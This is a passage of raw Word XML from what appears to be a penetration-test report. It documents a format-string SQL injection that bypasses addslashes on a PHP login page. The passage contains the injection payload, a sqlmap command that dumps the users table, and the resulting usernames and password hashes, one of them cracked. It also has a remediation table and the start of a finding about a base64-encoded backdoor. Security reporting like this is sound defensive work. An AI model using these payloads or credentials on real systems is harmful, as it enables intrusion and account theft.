        <w:t>username = %1$') UNION select * FROM users.users; -- -</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif" w:cs="Times New Roman"/>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="202124"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pwd = any</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="141618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>In the current situation the limit imposed by the addslashes function prevents us from escaping from the query and executing a sql injection, however there is still a function that is known to be vulnerable in other languages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Roboto;sans-serif" w:hAnsi="Roboto;sans-serif"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="141618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="141618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">like C and C++ and that perhaps can help us break the restrictions. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Looking carefully at the source code however it is possible to notice that we can control the format argument</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="141618"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>through the pass parameter because the symbols used to define conversion specification strings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="141618"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>(% and $) are not sanitized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol"/>
          <w:caps w:val="false"/>
          <w:smallCaps w:val="false"/>
          <w:color w:val="141618"/>
          <w:spacing w:val="0"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>by the addslashes function (which considers only ' " and \).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Using sqlmap we are also able to enumerate DB users and hased password:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>python3 sqlmap.py -u "http://internal.vese.com/login.php" --forms --crawl=2 -D users -T users -C username,password –dump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>+-----------------+------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>| username        | password                                                         |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>+-----------------+------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>| eladministrador | 0db613e31e5b53a238e35469d752ffa6                                 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>| dstewart        | 6f299895ed844bd22404cfd69b3b6e2c                                 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>| decryptme       | ee234f62b7578420925a2307b51c64b3ca153ad7336d8636f7ac3e1a8888e6c2 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>| nsanders        | ef91307aae4da64fa55b90ae1fc1f3c5 (helloitsme)                    |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>| bgenbu          | ffd9ab7908160075448185d7620ecd38                                 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>+-----------------+------------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="708" w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto;apple-system;BlinkMacSystemFont;Segoe UI;Roboto;Helvetica;Arial;sans-serif;Apple Color Emoji;Segoe UI Emoji;Segoe UI Symbol" w:hAnsi="Roboto;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41618"/>
          <w:spacing w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-793" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="58" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="58" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>DEV</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Vector:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana;sans-serif"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="444444"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>To avoid this type of vulnerability, use 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b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="274466"/>
                <w:spacing w:val="0"/>
                <w:shd w:fill="EFF7FF" w:val="clear"/>
              </w:rPr>
              <w:t>mysql_real_escape_string()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana;sans-serif"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="444444"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:smallCaps w:val="false"/>
                <w:caps w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:strike w:val="false"/>
                <w:sz w:val="26"/>
                <w:spacing w:val="0"/>
                <w:i w:val="false"/>
                <w:u w:val="none"/>
                <w:b w:val="false"/>
                <w:effect w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:bdr w:val="single" w:sz="2" w:space="1" w:color="0077DD"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana;sans-serif"/>
                <w:color w:val="444444"/>
              </w:rPr>
              <w:instrText> HYPERLINK "http://www.zend.com/php5/articles/php5-mysqli.php" \l "Heading11"</w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:smallCaps w:val="false"/>
                <w:caps w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:strike w:val="false"/>
                <w:sz w:val="26"/>
                <w:spacing w:val="0"/>
                <w:i w:val="false"/>
                <w:u w:val="none"/>
                <w:b w:val="false"/>
                <w:effect w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:bdr w:val="single" w:sz="2" w:space="1" w:color="0077DD"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana;sans-serif"/>
                <w:color w:val="444444"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana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44444"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="26"/>
                <w:u w:val="none"/>
                <w:effect w:val="none"/>
                <w:bdr w:val="single" w:sz="2" w:space="1" w:color="0077DD"/>
                <w:shd w:fill="auto" w:val="clear"/>
              </w:rPr>
              <w:t>prepared statements</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="InternetLink"/>
                <w:smallCaps w:val="false"/>
                <w:caps w:val="false"/>
                <w:dstrike w:val="false"/>
                <w:strike w:val="false"/>
                <w:sz w:val="26"/>
                <w:spacing w:val="0"/>
                <w:i w:val="false"/>
                <w:u w:val="none"/>
                <w:b w:val="false"/>
                <w:effect w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:bdr w:val="single" w:sz="2" w:space="1" w:color="0077DD"/>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana;sans-serif"/>
                <w:color w:val="444444"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman" w:ascii="Mallory;Verdana;sans-serif" w:hAnsi="Mallory;Verdana;sans-serif"/>
                <w:b w:val="false"/>
                <w:i w:val="false"/>
                <w:caps w:val="false"/>
                <w:smallCaps w:val="false"/>
                <w:color w:val="444444"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="26"/>
              </w:rPr>
              <w:t>, or any of the major database abstraction libraries.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:ind w:hanging="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:ind w:hanging="0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  <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="-793" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="58" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="58" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04a0" w:noHBand="0" w:noVBand="1" w:firstColumn="1" w:lastRow="0" w:lastColumn="0" w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1871"/>
        <w:gridCol w:w="8209"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Backdoor into the contact form encoded in base64</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8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widowControl w:val="false"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/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0CECE" w:themeFill="background2" w:themeFillShade="e6" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:widowControl w:val="false"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0" w:right="-170" w:hanging="0"/>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
